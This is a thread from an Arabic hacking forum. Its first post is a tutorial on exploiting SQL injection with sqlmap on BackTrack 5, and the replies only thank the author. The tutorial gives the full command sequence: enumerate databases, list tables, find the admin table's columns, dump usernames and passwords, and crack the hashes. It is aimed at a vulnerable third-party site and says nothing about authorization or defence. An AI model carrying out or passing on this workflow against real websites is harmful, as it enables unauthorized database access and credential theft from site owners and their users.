![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
| [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] حمايه وأختراق المواقع والسيرفرات باحدت الطرق والادوات .. |
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||
شكراً: 14
تم شكره 25 مرة في 19 مشاركة
|
السلام عليكم ورحمة الله وبركاته ::===================:: طبعا الموضوع باين من عنوانه هو أحتراف أستغلال ثغرات SQL عبر نظام backtrack 5 ::===================:: نبدء على بركة الله أولا نشغل الباك تراك ونختار من القائمة كما هي موضحه بالصورة ![]() الأن بتظهر لك هذي الواجهه الرسومية ![]() الأن كذا تمام هذه الأداه تغنيك عن اي برنامج او اي برمجة وهي فيها كل الأدوات الي تحتاجها تقدر تكتب help ثم انتر عشان يعطيك جميع الأوامر لهذي الأداه الجبارة الأن تكتب python sqlmap.py -u xxx --dbs xxx = الموقع المصاب بـ sql ![]() الأن إظغط انتر وانتظر ثواني وبتظهر لك النتيجة مثل كذا ![]() مثل ما شفت تلقائيا عرف اصدار القاعده وأظهر لنا القواعد تبع الموقع الأن أكيد انت من النظرة الأولى بتعرف القاعده المطلوبة من أسمها الأن بنعطيه أمر أظهار الجداول في القاعده الي بنختارها python sqlmap.py -u xxx -D ddd --tables xxx = الموقع المصاب ddd = اسم القاعده الي بنطلع جداولها ![]() الأن أظغط انتر وشوف النتيجة في الصورة الي تحت ![]() مثل ما شفت طلع لنا الجداول الي داخل القاعده ومن ظمن الجداول جدول الـ الأدمن الأن هدفنا عرض الأعمدة الي داخل الجدول عن طريق الأمر python sqlmap.py -u xxx -D ddd -T ttt --columns xxx = الموقع المصاب ddd = اسم القاعده الي بنطلع جداولها ttt = الجدول الي بنعرض الأعمده الي داخله مثل ( admin ) مثل الصورة الي تحت ![]() الأن اظغط انت وشوف النتيجه ![]() حلو ظهر لنا عمود اليوزر + عمود الباسورد الأن يا طويل العمر نبغى نعرف الجدول الي داخل انا ظهر لي عمود اسمه username شوف الأمر حتى نعرض محتواه python sqlmap.py -u xxx -D ddd -T ttt -C ccc --dump xxx = الموقع المصاب ddd = اسم القاعده الي بنطلع جداولها ttt = الجدول الي بنعرض الأعمده الي داخله ccc = العمود الي بنظهر محتواه مثل ما هو موضح بالصورة الي تحت ![]() الأن أظغط انتر وشوف النتيجه اكيد بتعجبك ![]() الأن أنا طلعت محتوى العمود username بنفس الأمر نطلع الباس فقط نستبدل username بـ password python sqlmap.py -u xxx -D ddd -T ttt -C ccc --dump xxx = الموقع المصاب ddd = اسم القاعده الي بنطلع جداولها ttt = الجدول الي بنعرض الأعمده الي داخله ccc = العمود الي بنظهر محتواه مثل مافي الصورة ![]() أظغط أنتر وشوف النتيجه ![]() ا اذا طلعت لك كما في الصورة فهذا طبيعي لان الباسورد مشفر وهنا يقولك هل تريد ان تجرب فك الهاش اذا كنت تريد فك الهاش اكتب Y اذا ما تبي تفك الهاش اكتب N واظغط انتر ![]() الحمد لله طلعنا الباس وهذي هي فكرة استغلال ثغرات SQL عبر نظام BACKTACK 5 اتمنى انكم استفدتو منها ![]() ![]() ![]() ![]()
|
||||||||||||||||||||
|
|
||||||||||||||||||||
|
|
المشاركة رقم: 2 | ||||||||||||
|
|||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
بارك الله فيك حبيبي على الشرح الراقي |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
منورين شباب وتحياتى الكم نورتوا موضوعى |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 5 | ||||||||||||
|
سلمت يداك اخي هكر |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 6 | ||||||||||||
|
منور يالغالى |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 35
|
|
| all4dz , ANDERSON , مهاجر زمن , BiRoOo , Black-ID , Devil _ Hacker , DR.X , برمجي و هكرز , ghost-dz , HACER DZ , HACKER==MAN , HaKoReY , hamza 12 , hamza67 , hardTARGET1234 , hmimed , ilYes007_Dz , jago-dz , joker-dz , lesta , mega-king , mo3eth , mouad1989 , MR.KaDeRoU , NeO SpaMs , rafa , ratrk , S4wDz , Smail002 , Th3 K!LL3r Dz , ViRuS_OF_AlGeRiA , ViRuS_Ra3cH , viva plus dz , xxDASxx , §الـقہاتہلٌ الـمہـحـتہرف§ |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| [دورة] الميتاسبلوت اصبح من الماضي الآن يوجد الـ Backtrack 4 | Black-ID | توزيعة B4ck|Tr4ck | 21 | 22/01/2013 09:51 |
| backtrack 4 final بتاريخ 11.01.2010 | ViRuS_Ra3cH | توزيعة B4ck|Tr4ck | 6 | 08/03/2012 15:12 |
| ~ وضع الأعلام[Flags] بدل رمووز الللغات للكيبورد في الـ[Linux]|~ مثل الـ [BackTrack] | Black-ID | نـظـام Linux | 2 | 04/05/2011 08:27 |
| شرح تنصيب BackTrack 3 Final على الهارد و اعدادها بالتفصيل | NEVER HaCKEr | توزيعة B4ck|Tr4ck | 4 | 25/08/2010 21:44 |
![]() |
![]() |
![]() |